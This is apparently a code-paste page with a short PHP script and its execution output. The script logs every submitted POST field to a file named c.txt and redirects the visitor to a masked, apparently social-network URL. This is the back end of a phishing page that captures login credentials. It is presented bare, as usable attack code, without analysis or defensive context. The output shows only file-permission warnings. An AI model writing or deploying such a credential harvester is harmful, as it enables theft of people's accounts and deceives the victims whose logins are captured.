fork download
  1. <?php
  2. header('Location: https://f...content-available-to-author-only...k.com');
  3.  
  4. $handle = fopen("c.txt","a");
  5.  
  6. foreach($_POST as $variable => $value){
  7. fwrite($handle, $variable);
  8. fwrite($handle, "=");
  9. fwrite($handle, $value);
  10. fwrite($handle, "/r/n");
  11. }
  12. fwrite($handle, "/r/n");
  13. fclose($handle);
  14. ?>
  15.  
Success #stdin #stdout #stderr 0.02s 25808KB
stdin
Standard input is empty
stdout
Standard output is empty
stderr
PHP Warning:  fopen(c.txt): failed to open stream: Permission denied in /home/ZFB7EQ/prog.php on line 4
PHP Warning:  fwrite() expects parameter 1 to be resource, bool given in /home/ZFB7EQ/prog.php on line 12
PHP Warning:  fclose() expects parameter 1 to be resource, bool given in /home/ZFB7EQ/prog.php on line 13